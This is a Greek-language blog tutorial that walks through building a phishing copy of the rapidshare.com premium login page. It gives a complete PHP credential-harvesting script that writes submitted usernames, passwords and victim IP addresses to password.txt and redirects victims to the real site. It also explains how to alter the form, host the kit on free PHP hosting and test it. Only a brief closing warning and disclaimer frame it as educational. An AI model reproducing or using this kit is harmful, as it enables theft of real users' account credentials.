ψηφιστε

Η τεχνική του phishing


Μία τεχνική του χάκινγκ που χρησιμοποιείται για κλέψιμο κωδικών και λογαριασμών είναι το Phishing.Στο συγκεκριμένο άρθρο θα αναλύσουμε την τεχνική αυτήν μέσα από ένα παράδειγμα για να δούμε πως μπορούν οι χάκερς να μας ξεγελάσουν για να κλέψουν τα account μας.
Θα χρησιμοποιήσουμε την ιστοσελίδα rapidshare.com σαν παράδειγμα για το άρθρο μας.
Πηγαίνουμε λοιπόν στο site http://www.rapidshare.com και επιλέγουμε να πάμε στην σελίδα premium zone.Εκεί κάνουμε δεξί κλικ στην σελίδα και επιλέγουμε προβολή προέλευσης.Επιλέγουμε όλο των κώδικα και τον αντιγράφουμε σε ένα έγγραφο σημειωματαρίου.
Στον κώδικα μας ενδιαφέρουν δύο λέξεις:method και action.Ψάχνουμε με την εύρεση (ctrl+F) για να βρούμε που αναφέρεται η λέξη method.Θα δούμε ότι στο αποτέλεσμα θα μας εμφανίσει method=”post” και αλλάζουμε το post με την λέξη get.
Τώρα ψάχνουμε για την λέξη action μέσα στον κώδικα και θα δούμε κάτι σαν το παρακάτω:
Αντικαθιστούμε τον παραπάνω σύνδεσμο με το next.php δηλαδή:
action=”next.php”
Σώζουμε αυτό το αρχείο σαν index.html και τώρα θα δημιουργήσουμε την σελίδα next.php.Δημιουργούμε ένα νέο έγγραφο σημειωματαρείου και πληκτρολογούμε τον παρακάτω κώδικα:
Κώδικας:
<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER['REMOTE_ADDR'];
header(“Location: Edw vazoume to redirect url mas”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);
setcookie (“user”, “empty”, time()+3600);
exit;
?>
Η σελίδα next.php θα είναι και η σελίδα στην οποία θα κατευθυνθούν οι χρήστες αφότου βάλουν τις πληροφορίες λογαριασμού τους στην πρώτη σελίδα.
Στον παραπάνω κώδικα μετά από την λέξη location βάζουμε το redirect url μας το οποίο μπορεί να είναι η αυθεντική σελίδα του rapidshare ή οποιαδήποτε άλλη σελίδα επιθυμούμε εμείς να κατευθύνει τα θύματα μας αφότου βάλουν τις πληροφορίες του λογαριασμού τους.
Επιλέγουμε για το παράδειγμα μας την αυθεντική σελίδα του rapishare.Δηλαδή θα έχουμε:
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
Σώζουμε αυτό το αρχείο σαν next.php και τώρα δημιουργούμε ένα ακόμα έγγραφο σημειωματαρείου με την ονομασία password.txt το οποίο και θα είναι το έγγραφο στο οποίο θα αποθηκεύονται οι πληροφορίες των λογαριασμών των θυμάτων.
Πηγαίνουμε σε ένα free web hosting site που υποστηρίζει php (όπωςhttp://www.freeweb7.com/) και αφού σιγουρευτούμε ότι έχουμε διαγράψει όλα τα default αρχεία που υπάρχουν από τον web hosting provider όπως το index.html  ανεβάζουμε τα 3 αρχεία μας (index.html,next.php,password.txt).
Τώρα πηγαίνουμε στην ιστοσελίδα που έχουμε φτιάξει την ψεύτικη και βάζουμε test στο login και test στο password για να τσεκάρουμε αν θα εμφανιστούν στο password.txt.Αν εμφανιστούν τότε σημαίνει ότι η ψεύτικη μας σελίδα δουλεύει.
Με την παραπάνω μεθοδολογία θα δουλέψει ένας phisher για να κλέψει κωδικούς.Γι’αυτό μην βάζετε ποτέ τους κωδικούς σας σε ιστοσελίδες που δεν εμπιστεύεστε και πάντα να κοιτάτε το url για να δείτε αν είναι το αυθεντικό ή κάποιο που μοιάζει με το αληθινό domain και θέλει να μας παραπλανήσει.
Σημείωση:
Το παραπάνω παράδειγμα είναι απλώς για εκπαιδευτικούς σκόπους και δεν συνίσταται η χρήση του ενάντια σε άλλους χρήστες.Το datalibraryδεν φέρει ουδεμία ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλους σκοπούς.